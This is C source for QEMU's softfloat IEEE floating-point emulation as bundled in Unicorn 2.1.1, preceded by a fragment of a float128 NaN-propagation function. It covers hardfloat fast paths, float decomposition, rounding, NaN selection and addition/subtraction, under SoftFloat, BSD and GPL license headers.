*----------------------------------------------------------------------------*/ static float128 propagateFloat128NaN(float128 a, float128 b, float_status *status) { flag aIsLargerSignificand; FloatClass a_cls, b_cls; /* This is not complete, but is good enough for pickNaN. */ a_cls = (!float128_is_any_nan(a) ? float_class_normal : float128_is_signaling_nan(a, status) ? float_class_snan : float_class_qnan); b_cls = (!float128_is_any_nan(b) ? float_class_normal : float128_is_signaling_nan(b, status) ? float_class_snan : float_class_qnan); if (is_snan(a_cls) || is_snan(b_cls)) { float_raise(float_flag_invalid, status); } if (status->default_nan_mode) { return float128_default_nan(status); } if (lt128(a.high << 1, a.low, b.high << 1, b.low)) { aIsLargerSignificand = 0; } else if (lt128(b.high << 1, b.low, a.high << 1, a.low)) { aIsLargerSignificand = 1; } else { aIsLargerSignificand = (a.high < b.high) ? 1 : 0; } if (pickNaN(a_cls, b_cls, aIsLargerSignificand)) { if (is_snan(b_cls)) { return float128_silence_nan(b, status); } return b; } else { if (is_snan(a_cls)) { return float128_silence_nan(a, status); } return a; } }
unicorn-2.1.1/qemu/fpu/softfloat.c
/* * QEMU float support * * The code in this source file is derived from release 2a of the SoftFloat * IEC/IEEE Floating-point Arithmetic Package. Those parts of the code (and * some later contributions) are provided under that license, as detailed below. * It has subsequently been modified by contributors to the QEMU Project, * so some portions are provided under: * the SoftFloat-2a license * the BSD license * GPL-v2-or-later * * Any future contributions to this file after December 1st 2014 will be * taken to be licensed under the Softfloat-2a license unless specifically * indicated otherwise. */ /* =============================================================================== This C source file is part of the SoftFloat IEC/IEEE Floating-point Arithmetic Package, Release 2a. Written by John R. Hauser. This work was made possible in part by the International Computer Science Institute, located at Suite 600, 1947 Center Street, Berkeley, California 94704. Funding was partially provided by the National Science Foundation under grant MIP-9311980. The original version of this code was written as part of a project to build a fixed-point vector processor in collaboration with the University of California at Berkeley, overseen by Profs. Nelson Morgan and John Wawrzynek. More information is available through the Web page `http://HTTP.CS.Berkeley.EDU/~jhauser/ arithmetic/SoftFloat.html'.
THIS SOFTWARE IS DISTRIBUTED AS IS, FOR FREE. Although reasonable effort has been made to avoid it, THIS SOFTWARE MAY CONTAIN FAULTS THAT WILL AT TIMES RESULT IN INCORRECT BEHAVIOR. USE OF THIS SOFTWARE IS RESTRICTED TO PERSONS AND ORGANIZATIONS WHO CAN AND WILL TAKE FULL RESPONSIBILITY FOR ANY AND ALL LOSSES, COSTS, OR OTHER PROBLEMS ARISING FROM ITS USE. Derivative works are acceptable, even for commercial purposes, so long as (1) they include prominent notice that the work is derivative, and (2) they include prominent notice akin to these four paragraphs for those parts of this code that are retained. =============================================================================== */ /* BSD licensing: * Copyright (c) 2006, Fabrice Bellard * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * 1. Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * * 3. Neither the name of the copyright holder nor the names of its contributors * may be used to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF * THE POSSIBILITY OF SUCH DAMAGE. */ /* Portions of this work are licensed under the terms of the GNU GPL, * version 2 or later. See the COPYING file in the top-level directory. */ /* softfloat (and in particular the code in softfloat-specialize.h) is * target-dependent and needs the TARGET_* macros. */ #include "qemu/osdep.h" #include <math.h> #include "qemu/bitops.h" #include "fpu/softfloat.h" /* We only need stdlib for abort() */ /*---------------------------------------------------------------------------- | Primitive arithmetic functions, including multi-word arithmetic, and | division and square root approximations. (Can be specialized to target if | desired.) *----------------------------------------------------------------------------*/ #include "fpu/softfloat-macros.h" /* * Hardfloat * * Fast emulation of guest FP instructions is challenging for two reasons. * First, FP instruction semantics are similar but not identical, particularly * when handling NaNs. Second, emulating at reasonable speed the guest FP * exception flags is not trivial: reading the host's flags register with a * feclearexcept & fetestexcept pair is slow [slightly slower than soft-fp], * and trapping on every FP exception is not fast nor pleasant to work with. 
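 * (An example of the first challenge: targets disagree on which NaN a
 * two-operand operation returns, which is what pickNaN() in
 * softfloat-specialize.inc.c models.)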
* * We address these challenges by leveraging the host FPU for a subset of the * operations. To do this we expand on the idea presented in this paper: * * Guo, Yu-Chuan, et al. "Translating the ARM Neon and VFP instructions in a * binary translator." Software: Practice and Experience 46.12 (2016):1591-1615. * * The idea is thus to leverage the host FPU to (1) compute FP operations * and (2) identify whether FP exceptions occurred while avoiding * expensive exception flag register accesses. * * An important optimization shown in the paper is that given that exception * flags are rarely cleared by the guest, we can avoid recomputing some flags. * This is particularly useful for the inexact flag, which is very frequently * raised in floating-point workloads. * * We optimize the code further by deferring to soft-fp whenever FP exception * detection might get hairy. Two examples: (1) when at least one operand is * denormal/inf/NaN; (2) when operands are not guaranteed to lead to a 0 result * and the result is < the minimum normal. */ #define GEN_INPUT_FLUSH__NOCHECK(name, soft_t) \ static inline void name(soft_t *a, float_status *s) \ { \ if (unlikely(soft_t ## _is_denormal(*a))) { \ *a = soft_t ## _set_sign(soft_t ## _zero, \ soft_t ## _is_neg(*a)); \ s->float_exception_flags |= float_flag_input_denormal; \ } \ } GEN_INPUT_FLUSH__NOCHECK(float32_input_flush__nocheck, float32) GEN_INPUT_FLUSH__NOCHECK(float64_input_flush__nocheck, float64) #undef GEN_INPUT_FLUSH__NOCHECK #define GEN_INPUT_FLUSH1(name, soft_t) \ static inline void name(soft_t *a, float_status *s) \ { \ if (likely(!s->flush_inputs_to_zero)) { \ return; \ } \ soft_t ## _input_flush__nocheck(a, s); \ } GEN_INPUT_FLUSH1(float32_input_flush1, float32) GEN_INPUT_FLUSH1(float64_input_flush1, float64) #undef GEN_INPUT_FLUSH1 #define GEN_INPUT_FLUSH2(name, soft_t) \ static inline void name(soft_t *a, soft_t *b, float_status *s) \ { \ if (likely(!s->flush_inputs_to_zero)) { \ return; \ } \ soft_t ## _input_flush__nocheck(a, s); \ soft_t ## _input_flush__nocheck(b, s); \ } GEN_INPUT_FLUSH2(float32_input_flush2, float32) GEN_INPUT_FLUSH2(float64_input_flush2, float64) #undef GEN_INPUT_FLUSH2 #define GEN_INPUT_FLUSH3(name, soft_t) \ static inline void name(soft_t *a, soft_t *b, soft_t *c, float_status *s) \ { \ if (likely(!s->flush_inputs_to_zero)) { \ return; \ } \ soft_t ## _input_flush__nocheck(a, s); \ soft_t ## _input_flush__nocheck(b, s); \ soft_t ## _input_flush__nocheck(c, s); \ } GEN_INPUT_FLUSH3(float32_input_flush3, float32) GEN_INPUT_FLUSH3(float64_input_flush3, float64) #undef GEN_INPUT_FLUSH3 /* * Choose whether to use fpclassify or float32/64_* primitives in the generated * hardfloat functions. Each combination of number of inputs and float size * gets its own value. */ #if defined(__x86_64__) # define QEMU_HARDFLOAT_1F32_USE_FP 0 # define QEMU_HARDFLOAT_1F64_USE_FP 1 # define QEMU_HARDFLOAT_2F32_USE_FP 0 # define QEMU_HARDFLOAT_2F64_USE_FP 1 # define QEMU_HARDFLOAT_3F32_USE_FP 0 # define QEMU_HARDFLOAT_3F64_USE_FP 1 #else # define QEMU_HARDFLOAT_1F32_USE_FP 0 # define QEMU_HARDFLOAT_1F64_USE_FP 0 # define QEMU_HARDFLOAT_2F32_USE_FP 0 # define QEMU_HARDFLOAT_2F64_USE_FP 0 # define QEMU_HARDFLOAT_3F32_USE_FP 0 # define QEMU_HARDFLOAT_3F64_USE_FP 0 #endif /* * QEMU_HARDFLOAT_USE_ISINF chooses whether to use isinf() over * float{32,64}_is_infinity when !USE_FP. * On x86_64/aarch64, using the former over the latter can yield a ~6% speedup. * On power64 however, using isinf() reduces fp-bench performance by up to 50%. 
*/ #if defined(__x86_64__) || defined(__aarch64__) # define QEMU_HARDFLOAT_USE_ISINF 1 #else # define QEMU_HARDFLOAT_USE_ISINF 0 #endif /* * Some targets clear the FP flags before most FP operations. This prevents * the use of hardfloat, since hardfloat relies on the inexact flag being * already set. */ #if defined(TARGET_PPC) || defined(__FAST_MATH__) # if defined(__FAST_MATH__) # warning disabling hardfloat due to -ffast-math: hardfloat requires an exact \ IEEE implementation # endif # define QEMU_NO_HARDFLOAT 1 # define QEMU_SOFTFLOAT_ATTR QEMU_FLATTEN #elif !defined(_MSC_VER) # define QEMU_NO_HARDFLOAT 0 # define QEMU_SOFTFLOAT_ATTR QEMU_FLATTEN __attribute__((noinline)) #else // MSVC # define QEMU_NO_HARDFLOAT 0 # define QEMU_SOFTFLOAT_ATTR #endif static inline bool can_use_fpu(const float_status *s) { if (QEMU_NO_HARDFLOAT) { return false; } return likely(s->float_exception_flags & float_flag_inexact && s->float_rounding_mode == float_round_nearest_even); } /* * Hardfloat generation functions. Each operation can have two flavors: * either using softfloat primitives (e.g. float32_is_zero_or_normal) for * most condition checks, or native ones (e.g. fpclassify). * * The flavor is chosen by the callers. Instead of using macros, we rely on the * compiler to propagate constants and inline everything into the callers. * * We only generate functions for operations with two inputs, since only * these are common enough to justify consolidating them into common code. */ typedef union { float32 s; float h; } union_float32; typedef union { float64 s; double h; } union_float64; typedef bool (*f32_check_fn)(union_float32 a, union_float32 b); typedef bool (*f64_check_fn)(union_float64 a, union_float64 b); typedef float32 (*soft_f32_op2_fn)(float32 a, float32 b, float_status *s); typedef float64 (*soft_f64_op2_fn)(float64 a, float64 b, float_status *s); typedef float (*hard_f32_op2_fn)(float a, float b); typedef double (*hard_f64_op2_fn)(double a, double b); /* 2-input is-zero-or-normal */ static inline bool f32_is_zon2(union_float32 a, union_float32 b) { if (QEMU_HARDFLOAT_2F32_USE_FP) { /* * Not using a temp variable for consecutive fpclassify calls ends up * generating faster code. 
*/ return (fpclassify(a.h) == FP_NORMAL || fpclassify(a.h) == FP_ZERO) && (fpclassify(b.h) == FP_NORMAL || fpclassify(b.h) == FP_ZERO); } return float32_is_zero_or_normal(a.s) && float32_is_zero_or_normal(b.s); } static inline bool f64_is_zon2(union_float64 a, union_float64 b) { if (QEMU_HARDFLOAT_2F64_USE_FP) { return (fpclassify(a.h) == FP_NORMAL || fpclassify(a.h) == FP_ZERO) && (fpclassify(b.h) == FP_NORMAL || fpclassify(b.h) == FP_ZERO); } return float64_is_zero_or_normal(a.s) && float64_is_zero_or_normal(b.s); } /* 3-input is-zero-or-normal */ static inline bool f32_is_zon3(union_float32 a, union_float32 b, union_float32 c) { if (QEMU_HARDFLOAT_3F32_USE_FP) { return (fpclassify(a.h) == FP_NORMAL || fpclassify(a.h) == FP_ZERO) && (fpclassify(b.h) == FP_NORMAL || fpclassify(b.h) == FP_ZERO) && (fpclassify(c.h) == FP_NORMAL || fpclassify(c.h) == FP_ZERO); } return float32_is_zero_or_normal(a.s) && float32_is_zero_or_normal(b.s) && float32_is_zero_or_normal(c.s); } static inline bool f64_is_zon3(union_float64 a, union_float64 b, union_float64 c) { if (QEMU_HARDFLOAT_3F64_USE_FP) { return (fpclassify(a.h) == FP_NORMAL || fpclassify(a.h) == FP_ZERO) && (fpclassify(b.h) == FP_NORMAL || fpclassify(b.h) == FP_ZERO) && (fpclassify(c.h) == FP_NORMAL || fpclassify(c.h) == FP_ZERO); } return float64_is_zero_or_normal(a.s) && float64_is_zero_or_normal(b.s) && float64_is_zero_or_normal(c.s); } static inline bool f32_is_inf(union_float32 a) { if (QEMU_HARDFLOAT_USE_ISINF) { return isinf(a.h); } return float32_is_infinity(a.s); } static inline bool f64_is_inf(union_float64 a) { if (QEMU_HARDFLOAT_USE_ISINF) { return isinf(a.h); } return float64_is_infinity(a.s); } /* Note: @fast_test and @post can be NULL */ static inline float32 float32_gen2(float32 xa, float32 xb, float_status *s, hard_f32_op2_fn hard, soft_f32_op2_fn soft, f32_check_fn pre, f32_check_fn post, f32_check_fn fast_test, soft_f32_op2_fn fast_op) { union_float32 ua, ub, ur; ua.s = xa; ub.s = xb; if (unlikely(!can_use_fpu(s))) { goto soft; } float32_input_flush2(&ua.s, &ub.s, s); if (unlikely(!pre(ua, ub))) { goto soft; } if (fast_test && fast_test(ua, ub)) { return fast_op(ua.s, ub.s, s); } ur.h = hard(ua.h, ub.h); if (unlikely(f32_is_inf(ur))) { s->float_exception_flags |= float_flag_overflow; } else if (unlikely(fabsf(ur.h) <= FLT_MIN)) { if (post == NULL || post(ua, ub)) { goto soft; } } return ur.s; soft: return soft(ua.s, ub.s, s); } static inline float64 float64_gen2(float64 xa, float64 xb, float_status *s, hard_f64_op2_fn hard, soft_f64_op2_fn soft, f64_check_fn pre, f64_check_fn post, f64_check_fn fast_test, soft_f64_op2_fn fast_op) { union_float64 ua, ub, ur; ua.s = xa; ub.s = xb; if (unlikely(!can_use_fpu(s))) { goto soft; } float64_input_flush2(&ua.s, &ub.s, s); if (unlikely(!pre(ua, ub))) { goto soft; } if (fast_test && fast_test(ua, ub)) { return fast_op(ua.s, ub.s, s); } ur.h = hard(ua.h, ub.h); if (unlikely(f64_is_inf(ur))) { s->float_exception_flags |= float_flag_overflow; } else if (unlikely(fabs(ur.h) <= DBL_MIN)) { if (post == NULL || post(ua, ub)) { goto soft; } } return ur.s; soft: return soft(ua.s, ub.s, s); } /*---------------------------------------------------------------------------- | Returns the fraction bits of the single-precision floating-point value `a'. 
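| For example, 0x40490FDB (the nearest single-precision value to pi) has
| fraction bits 0x490FDB; the exponent and sign extractors below return
| 0x80 (128) and 0 for the same value. (Worked example added for
| illustration.)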
*----------------------------------------------------------------------------*/ static inline uint32_t extractFloat32Frac(float32 a) { return float32_val(a) & 0x007FFFFF; } /*---------------------------------------------------------------------------- | Returns the exponent bits of the single-precision floating-point value `a'. *----------------------------------------------------------------------------*/ static inline int extractFloat32Exp(float32 a) { return (float32_val(a) >> 23) & 0xFF; } /*---------------------------------------------------------------------------- | Returns the sign bit of the single-precision floating-point value `a'. *----------------------------------------------------------------------------*/ static inline flag extractFloat32Sign(float32 a) { return float32_val(a) >> 31; } /*---------------------------------------------------------------------------- | Returns the fraction bits of the double-precision floating-point value `a'. *----------------------------------------------------------------------------*/ static inline uint64_t extractFloat64Frac(float64 a) { return float64_val(a) & UINT64_C(0x000FFFFFFFFFFFFF); } /*---------------------------------------------------------------------------- | Returns the exponent bits of the double-precision floating-point value `a'. *----------------------------------------------------------------------------*/ static inline int extractFloat64Exp(float64 a) { return (float64_val(a) >> 52) & 0x7FF; } /*---------------------------------------------------------------------------- | Returns the sign bit of the double-precision floating-point value `a'. *----------------------------------------------------------------------------*/ static inline flag extractFloat64Sign(float64 a) { return float64_val(a) >> 63; } /* * Classify a floating point number. Everything above float_class_qnan * is a NaN so cls >= float_class_qnan is any NaN. */ #ifndef _MSC_VER typedef enum __attribute__ ((__packed__)) { float_class_unclassified, float_class_zero, float_class_normal, float_class_inf, float_class_qnan, /* all NaNs from here */ float_class_snan, } FloatClass; #else __pragma(pack(push, 1)) typedef enum { float_class_unclassified, float_class_zero, float_class_normal, float_class_inf, float_class_qnan, /* all NaNs from here */ float_class_snan, } FloatClass; __pragma(pack(pop)) #endif /* Simple helpers for checking if, or what kind of, NaN we have */ #ifndef _MSC_VER static inline __attribute__((unused)) bool is_nan(FloatClass c) #else static inline bool is_nan(FloatClass c) #endif { return unlikely(c >= float_class_qnan); } #ifndef _MSC_VER static inline __attribute__((unused)) bool is_snan(FloatClass c) #else static inline bool is_snan(FloatClass c) #endif { return c == float_class_snan; } #ifndef _MSC_VER static inline __attribute__((unused)) bool is_qnan(FloatClass c) #else static inline bool is_qnan(FloatClass c) #endif { return c == float_class_qnan; } /* * Structure holding all of the decomposed parts of a float. The * exponent is unbiased and the fraction is normalized. All * calculations are done with a 64 bit fraction and then rounded as * appropriate for the final format. * * Thanks to the packed FloatClass a decent compiler should be able to * fit the whole structure into registers and avoid using the stack * for parameter passing. 
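 *
 * As an illustrative example (worked by hand, not from the original
 * source): the float32 value 1.5f (0x3FC00000) canonicalizes to
 * cls = float_class_normal, sign = false, exp = 0 (unbiased) and
 * frac = 0x6000000000000000, i.e. binary 1.1 aligned so that the
 * integer bit sits at DECOMPOSED_BINARY_POINT (bit 62).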
*/ typedef struct { uint64_t frac; int32_t exp; FloatClass cls; bool sign; } FloatParts; #define DECOMPOSED_BINARY_POINT (64 - 2) #define DECOMPOSED_IMPLICIT_BIT (1ull << DECOMPOSED_BINARY_POINT) #define DECOMPOSED_OVERFLOW_BIT (DECOMPOSED_IMPLICIT_BIT << 1) /* Structure holding all of the relevant parameters for a format. * exp_size: the size of the exponent field * exp_bias: the offset applied to the exponent field * exp_max: the maximum normalised exponent * frac_size: the size of the fraction field * frac_shift: shift to normalise the fraction with DECOMPOSED_BINARY_POINT * The following are computed based on the size of the fraction * frac_lsb: least significant bit of fraction * frac_lsbm1: the bit below the least significant bit (for rounding) * round_mask/roundeven_mask: masks used for rounding * The following optional modifiers are available: * arm_althp: handle ARM Alternative Half Precision */ typedef struct { int exp_size; int exp_bias; int exp_max; int frac_size; int frac_shift; uint64_t frac_lsb; uint64_t frac_lsbm1; uint64_t round_mask; uint64_t roundeven_mask; bool arm_althp; } FloatFmt; /* Expand fields based on the size of exponent and fraction */ #define FLOAT_PARAMS(E, F) \ .exp_size = E, \ .exp_bias = ((1 << E) - 1) >> 1, \ .exp_max = (1 << E) - 1, \ .frac_size = F, \ .frac_shift = DECOMPOSED_BINARY_POINT - F, \ .frac_lsb = 1ull << (DECOMPOSED_BINARY_POINT - F), \ .frac_lsbm1 = 1ull << ((DECOMPOSED_BINARY_POINT - F) - 1), \ .round_mask = (1ull << (DECOMPOSED_BINARY_POINT - F)) - 1, \ .roundeven_mask = (2ull << (DECOMPOSED_BINARY_POINT - F)) - 1 static const FloatFmt float16_params = { FLOAT_PARAMS(5, 10) }; static const FloatFmt float16_params_ahp = { FLOAT_PARAMS(5, 10), .arm_althp = true }; static const FloatFmt float32_params = { FLOAT_PARAMS(8, 23) }; static const FloatFmt float64_params = { FLOAT_PARAMS(11, 52) }; /* Unpack a float to parts, but do not canonicalize. */ static inline FloatParts unpack_raw(FloatFmt fmt, uint64_t raw) { const int sign_pos = fmt.frac_size + fmt.exp_size; return (FloatParts) { .cls = float_class_unclassified, .sign = extract64(raw, sign_pos, 1), .exp = extract64(raw, fmt.frac_size, fmt.exp_size), .frac = extract64(raw, 0, fmt.frac_size), }; } static inline FloatParts float16_unpack_raw(float16 f) { return unpack_raw(float16_params, f); } static inline FloatParts float32_unpack_raw(float32 f) { return unpack_raw(float32_params, f); } static inline FloatParts float64_unpack_raw(float64 f) { return unpack_raw(float64_params, f); } /* Pack a float from parts, but do not canonicalize.
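 * As a worked illustration: for float32 (FLOAT_PARAMS(8, 23), exponent at
 * bit 23, sign at bit 31), packing sign = 0, exp = 128, frac = 0x400000
 * deposits to 0x40400000, which is 3.0f.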
*/ static inline uint64_t pack_raw(FloatFmt fmt, FloatParts p) { const int sign_pos = fmt.frac_size + fmt.exp_size; uint64_t ret = deposit64(p.frac, fmt.frac_size, fmt.exp_size, p.exp); return deposit64(ret, sign_pos, 1, p.sign); } static inline float16 float16_pack_raw(FloatParts p) { return make_float16(pack_raw(float16_params, p)); } static inline float32 float32_pack_raw(FloatParts p) { return make_float32(pack_raw(float32_params, p)); } static inline float64 float64_pack_raw(FloatParts p) { return make_float64(pack_raw(float64_params, p)); } /*---------------------------------------------------------------------------- | Functions and definitions to determine: (1) whether tininess for underflow | is detected before or after rounding by default, (2) what (if anything) | happens when exceptions are raised, (3) how signaling NaNs are distinguished | from quiet NaNs, (4) the default generated quiet NaNs, and (5) how NaNs | are propagated from function inputs to output. These details are target- | specific. *----------------------------------------------------------------------------*/ #include "softfloat-specialize.inc.c" /* Canonicalize EXP and FRAC, setting CLS. */ static FloatParts sf_canonicalize(FloatParts part, const FloatFmt *parm, float_status *status) { if (part.exp == parm->exp_max && !parm->arm_althp) { if (part.frac == 0) { part.cls = float_class_inf; } else { part.frac <<= parm->frac_shift; part.cls = (parts_is_snan_frac(part.frac, status) ? float_class_snan : float_class_qnan); } } else if (part.exp == 0) { if (likely(part.frac == 0)) { part.cls = float_class_zero; } else if (status->flush_inputs_to_zero) { float_raise(float_flag_input_denormal, status); part.cls = float_class_zero; part.frac = 0; } else { int shift = clz64(part.frac) - 1; part.cls = float_class_normal; part.exp = parm->frac_shift - parm->exp_bias - shift + 1; part.frac <<= shift; } } else { part.cls = float_class_normal; part.exp -= parm->exp_bias; part.frac = DECOMPOSED_IMPLICIT_BIT + (part.frac << parm->frac_shift); } return part; } /* Round and uncanonicalize a floating-point number by parts. There * are FRAC_SHIFT bits that may require rounding at the bottom of the * fraction; these bits will be removed. The exponent will be biased * by EXP_BIAS and must be bounded by [0, EXP_MAX-1]. */ static FloatParts round_canonical(FloatParts p, float_status *s, const FloatFmt *parm) { const uint64_t frac_lsb = parm->frac_lsb; const uint64_t frac_lsbm1 = parm->frac_lsbm1; const uint64_t round_mask = parm->round_mask; const uint64_t roundeven_mask = parm->roundeven_mask; const int exp_max = parm->exp_max; const int frac_shift = parm->frac_shift; uint64_t frac, inc = 0; int exp, flags = 0; bool overflow_norm = false; frac = p.frac; exp = p.exp; switch (p.cls) { case float_class_normal: switch (s->float_rounding_mode) { case float_round_nearest_even: overflow_norm = false; inc = ((frac & roundeven_mask) != frac_lsbm1 ? frac_lsbm1 : 0); break; case float_round_ties_away: overflow_norm = false; inc = frac_lsbm1; break; case float_round_to_zero: overflow_norm = true; inc = 0; break; case float_round_up: inc = p.sign ? 0 : round_mask; overflow_norm = p.sign; break; case float_round_down: inc = p.sign ? round_mask : 0; overflow_norm = !p.sign; break; case float_round_to_odd: overflow_norm = true; inc = frac & frac_lsb ?
0 : round_mask; break; default: g_assert_not_reached(); break; } exp += parm->exp_bias; if (likely(exp > 0)) { if (frac & round_mask) { flags |= float_flag_inexact; frac += inc; if (frac & DECOMPOSED_OVERFLOW_BIT) { frac >>= 1; exp++; } } frac >>= frac_shift; if (parm->arm_althp) { /* ARM Alt HP eschews Inf and NaN for a wider exponent. */ if (unlikely(exp > exp_max)) { /* Overflow. Return the maximum normal. */ flags = float_flag_invalid; exp = exp_max; frac = -1; } } else if (unlikely(exp >= exp_max)) { flags |= float_flag_overflow | float_flag_inexact; if (overflow_norm) { exp = exp_max - 1; frac = -1; } else { p.cls = float_class_inf; goto do_inf; } } } else if (s->flush_to_zero) { flags |= float_flag_output_denormal; p.cls = float_class_zero; goto do_zero; } else { bool is_tiny = (s->float_detect_tininess == float_tininess_before_rounding) || (exp < 0) || !((frac + inc) & DECOMPOSED_OVERFLOW_BIT); shift64RightJamming(frac, 1 - exp, &frac); if (frac & round_mask) { /* Need to recompute round-to-even. */ switch (s->float_rounding_mode) { case float_round_nearest_even: inc = ((frac & roundeven_mask) != frac_lsbm1 ? frac_lsbm1 : 0); break; case float_round_to_odd: inc = frac & frac_lsb ? 0 : round_mask; break; } flags |= float_flag_inexact; frac += inc; } exp = (frac & DECOMPOSED_IMPLICIT_BIT ? 1 : 0); frac >>= frac_shift; if (is_tiny && (flags & float_flag_inexact)) { flags |= float_flag_underflow; } if (exp == 0 && frac == 0) { p.cls = float_class_zero; } } break; case float_class_zero: do_zero: exp = 0; frac = 0; break; case float_class_inf: do_inf: assert(!parm->arm_althp); exp = exp_max; frac = 0; break; case float_class_qnan: case float_class_snan: assert(!parm->arm_althp); exp = exp_max; frac >>= parm->frac_shift; break; default: g_assert_not_reached(); break; } float_raise(flags, s); p.exp = exp; p.frac = frac; return p; } /* Explicit FloatFmt version */ static FloatParts float16a_unpack_canonical(float16 f, float_status *s, const FloatFmt *params) { return sf_canonicalize(float16_unpack_raw(f), params, s); } static FloatParts float16_unpack_canonical(float16 f, float_status *s) { return float16a_unpack_canonical(f, s, &float16_params); } static float16 float16a_round_pack_canonical(FloatParts p, float_status *s, const FloatFmt *params) { return float16_pack_raw(round_canonical(p, s, params)); } static float16 float16_round_pack_canonical(FloatParts p, float_status *s) { return float16a_round_pack_canonical(p, s, &float16_params); } static FloatParts float32_unpack_canonical(float32 f, float_status *s) { return sf_canonicalize(float32_unpack_raw(f), &float32_params, s); } static float32 float32_round_pack_canonical(FloatParts p, float_status *s) { return float32_pack_raw(round_canonical(p, s, &float32_params)); } static FloatParts float64_unpack_canonical(float64 f, float_status *s) { return sf_canonicalize(float64_unpack_raw(f), &float64_params, s); } static float64 float64_round_pack_canonical(FloatParts p, float_status *s) { return float64_pack_raw(round_canonical(p, s, &float64_params)); } static FloatParts return_nan(FloatParts a, float_status *s) { switch (a.cls) { case float_class_snan: s->float_exception_flags |= float_flag_invalid; a = parts_silence_nan(a, s); /* fall through */ case float_class_qnan: if (s->default_nan_mode) { return parts_default_nan(s); } break; default: g_assert_not_reached(); break; } return a; } static FloatParts pick_nan(FloatParts a, FloatParts b, float_status *s) { if (is_snan(a.cls) || is_snan(b.cls)) { s->float_exception_flags |= 
float_flag_invalid; } if (s->default_nan_mode) { return parts_default_nan(s); } else { if (pickNaN(a.cls, b.cls, a.frac > b.frac || (a.frac == b.frac && a.sign < b.sign))) { a = b; } if (is_snan(a.cls)) { return parts_silence_nan(a, s); } } return a; } static FloatParts pick_nan_muladd(FloatParts a, FloatParts b, FloatParts c, bool inf_zero, float_status *s) { int which; if (is_snan(a.cls) || is_snan(b.cls) || is_snan(c.cls)) { s->float_exception_flags |= float_flag_invalid; } which = pickNaNMulAdd(a.cls, b.cls, c.cls, inf_zero, s); if (s->default_nan_mode) { /* Note that this check is after pickNaNMulAdd so that function * has an opportunity to set the Invalid flag. */ which = 3; } switch (which) { case 0: break; case 1: a = b; break; case 2: a = c; break; case 3: return parts_default_nan(s); default: g_assert_not_reached(); break; } if (is_snan(a.cls)) { return parts_silence_nan(a, s); } return a; } /* * Returns the result of adding or subtracting the values of the * floating-point values `a' and `b'. The operation is performed * according to the IEC/IEEE Standard for Binary Floating-Point * Arithmetic. */ static FloatParts addsub_floats(FloatParts a, FloatParts b, bool subtract, float_status *s) { bool a_sign = a.sign; bool b_sign = b.sign ^ subtract; if (a_sign != b_sign) { /* Subtraction */ if (a.cls == float_class_normal && b.cls == float_class_normal) { if (a.exp > b.exp || (a.exp == b.exp && a.frac >= b.frac)) { shift64RightJamming(b.frac, a.exp - b.exp, &b.frac); a.frac = a.frac - b.frac; } else { shift64RightJamming(a.frac, b.exp - a.exp, &a.frac); a.frac = b.frac - a.frac; a.exp = b.exp; a_sign ^= 1; } if (a.frac == 0) { a.cls = float_class_zero; a.sign = s->float_rounding_mode == float_round_down; } else { int shift = clz64(a.frac) - 1; a.frac = a.frac << shift; a.exp = a.exp - shift; a.sign = a_sign; } return a; } if (is_nan(a.cls) || is_nan(b.cls)) { return pick_nan(a, b, s); } if (a.cls == float_class_inf) { if (b.cls == float_class_inf) { float_raise(float_flag_invalid, s); return parts_default_nan(s); } return a; } if (a.cls == float_class_zero && b.cls == float_class_zero) { a.sign = s->float_rounding_mode == float_round_down; return a; } if (a.cls == float_class_zero || b.cls == float_class_inf) { b.sign = a_sign ^ 1; return b; } if (b.cls == float_class_zero) { return a; } } else { /* Addition */ if (a.cls == float_class_normal && b.cls == float_class_normal) { if (a.exp > b.exp) { shift64RightJamming(b.frac, a.exp - b.exp, &b.frac); } else if (a.exp < b.exp) { shift64RightJamming(a.frac, b.exp - a.exp, &a.frac); a.exp = b.exp; } a.frac += b.frac; if (a.frac & DECOMPOSED_OVERFLOW_BIT) { shift64RightJamming(a.frac, 1, &a.frac); a.exp += 1; } return a; } if (is_nan(a.cls) || is_nan(b.cls)) { return pick_nan(a, b, s); } if (a.cls == float_class_inf || b.cls == float_class_zero) { return a; } if (b.cls == float_class_inf || a.cls == float_class_zero) { b.sign = b_sign; return b; } } g_assert_not_reached(); return a; } /* * Returns the result of adding or subtracting the floating-point * values `a' and `b'. The operation is performed according to the * IEC/IEEE Standard for Binary Floating-Point Arithmetic. 
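 *
 * (Each width-specific wrapper below is a thin unpack/compute/repack
 * pipeline; float16_add, for example, is float16_unpack_canonical on both
 * operands, then addsub_floats, then float16_round_pack_canonical.)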
